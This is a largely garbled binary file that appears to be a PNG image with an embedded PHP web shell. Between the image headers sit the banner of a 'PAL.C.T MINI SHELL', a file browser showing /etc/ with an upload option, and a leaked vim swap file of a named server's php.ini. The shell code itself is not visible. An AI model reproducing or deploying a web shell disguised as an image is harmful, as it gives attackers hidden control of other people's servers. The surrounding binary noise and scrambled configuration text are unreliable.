php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /etc/
upload
files >> //etc/.php.ini.swn

b0VIM 7.2YW|	rootfaedahteknik.com/etc/php.iniutf-8
U3210#"! UtpRSHJ"SlFPWUHXkLiV _vRI'fpaE7ad)RxCBf


B

he&

Z


				=	kjKJ_ yJ76"gKJj;; mu; much more verbose when it comes to errors. We recommending using the; php.ini-development is very similar to its production variant, except it's; recommending using the production ini in production and testing environments.; compatibility with older or less security conscience applications. We; best practices at its core. But please be aware, these settings may break; php.ini-production contains settings which hold security, performance and; development environments.; in production environments and one that is recommended to be used in; PHP comes packaged with two INI files. One that is recommended to be used;;;;;;;;;;;;;;;;;;;; About this file ;;;;;;;;;;;;;;;;;;;;; you may only use these constants *after* the line that loads the extension.; dynamically loaded extension (either a PHP extension or a Zend extension),; If you use constants in your value, and these constants belong to a;  foo = "None"  ; sets foo to the string 'None';  foo = None    ; sets foo to an empty string;  foo =         ; sets foo to an empty string; sign, or by using the None keyword:; An empty string can be denoted by simply not writing anything after the equal; They can be turned off using the values 0, Off, False or No.; Boolean flags can be turned on using the values 1, On, True or Yes.; !  boolean NOT; ~  bitwise NOT; &  bitwise AND; ^  bitwise XOR; |  bitwise OR; Expressions in the INI file are limited to bitwise operators and parentheses:; previously set variable or directive (e.g. ${foo}); (e.g. E_ALL & ~E_NOTICE), a quoted string ("bar"), or a reference to a; of the INI constants (On, Off, True, False, Yes, No and None) or an expression; The value can be a string, a number, a PHP constant (e.g. E_ALL or M_PI), one; directive because it is not set or is mistyped, a default value will be used.; There is no name validation.  If PHP can't find an expected; Directives are variables used to configure PHP or PHP extensions.; Directive names are *case sensitive* - foo=bar is different from FOO=bar.; directive = value; Directives are specified using the following syntax:; http://www.php.net/manual/en/ini.sections.php; CGI/FastCGI.; at runtime. Currently, [PATH=] and [HOST=] sections only work under; special sections cannot be overridden by user-defined INI files or; PHP files served from www.example.com.  Directives set in these; following the section heading [HOST=www.example.com] only apply to; apply to PHP files in the /www/mysite directory.  Directives; Directives following the section heading [PATH=/www/mysite] only; they might mean something in the future. ; Section headers (e.g. [Foo]) are also silently ignored, even though; beginning with a semicolon are silently ignored (as you probably guessed).; The syntax of the file is extremely simple.  Whitespace and Lines; http://www.php.net/manual/en/configuration.file.php; See the PHP docs for more specific information.; Windows directory (C:\windows or C:\winnt); 6. The directory from the --with-config-file-path compile time option, or the; (otherwise in Windows); 5. The web server's directory (for SAPI modules), or directory of PHP; 4. Current working directory (except CLI); 3. A number of predefined registry keys on Windows (As of PHP 5.2.0); 2. The PHPRC environment variable. (As of PHP 5.2.0); 1. SAPI module specific location.; The following is a summary of its search order:; PHP attempts to find and load this configuration from a number of locations.; configuring many of the aspects of PHP's behavior.; PHP's initialization file, generally called php.ini, is responsible for;;;;;;;;;;;;;;;;;;;; About php.ini   ;;;;;;;;;;;;;;;;;;;;adcEF! 8
y
*
Z76b:9



h
g

				Z	#	"	?'&Aq#	; End:; tab-width: 4; Local Variables:;sysvshm.init_mem = 10000; A default size of the shared memory segment[sysvshm]soap.wsdl_cache_ttl=86400; http://www.php.net/manual/en/soap.configuration.php#ini.soap.wsdl-cache-ttl; instead of original one.; (time to live) Sets the number of second while cached file will be used soap.wsdl_cache_dir="/tmp"; http://www.php.net/manual/en/soap.configuration.php#ini.soap.wsdl-cache-dir; Sets the directory name where SOAP extension will put cache files.soap.wsdl_cache_enabled=1; http://www.php.net/manual/en/soap.configuration.php#ini.soap.wsdl-cache-enabled; Enables or disables WSDL caching feature.[soap]tidy.clean_output = Off; http://www.php.net/manual/en/tidy.configuration.php#ini.tidy.clean-output; such as dynamic images; WARNING: Do not use this option if you are generating non-html content; Should tidy clean and repair output automatically?;tidy.default_config = /usr/local/lib/php/default.tcfg; http://www.php.net/manual/en/tidy.configuration.php#ini.tidy.default-config; The path to a default tidy configuration file to use when using tidy[Tidy];exif.decode_jis_intel    = JIS; http://www.php.net/manual/en/exif.configuration.php#ini.exif.decode-jis-intel;exif.decode_jis_motorola = JIS; http://www.php.net/manual/en/exif.configuration.php#ini.exif.decode-jis-motorola;exif.encode_jis =; http://www.php.net/manual/en/exif.configuration.php#ini.exif.encode-jis;exif.decode_unicode_intel    = UCS-2LE; http://www.php.net/manual/en/exif.configuration.php#ini.exif.decode-unicode-intel;exif.decode_unicode_motorola = UCS-2BE; http://www.php.net/manual/en/exif.configuration.php#ini.exif.decode-unicode-motorola;exif.encode_unicode = ISO-8859-15; http://www.php.net/manual/en/exif.configuration.php#ini.exif.encode-unicode; intel byte order. A decode setting cannot be empty.; is used. For the decode settings you can distinguish between motorola and; given by corresponding encode setting. When empty mbstring.internal_encoding; With mbstring support this will automatically be converted into the encoding; Exif UNICODE user comments are handled as UCS-2BE/UCS-2LE and JIS as JIS.[exif];gd.jpeg_ignore_warning = 0; http://www.php.net/manual/en/image.configuration.php#ini.image.jpeg-ignore-warning; disabled by default; a gd image. The warning will then be displayed as notices; Tell the jpeg decode to ignore warnings and try to create[gd];mbstring.http_output_conv_mimetype=; Default: mbstring.http_output_conv_mimetype=^(text/|application/xhtml\+xml); is activated.; This directive specifies the regex pattern of content types for which mb_output_handler()
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`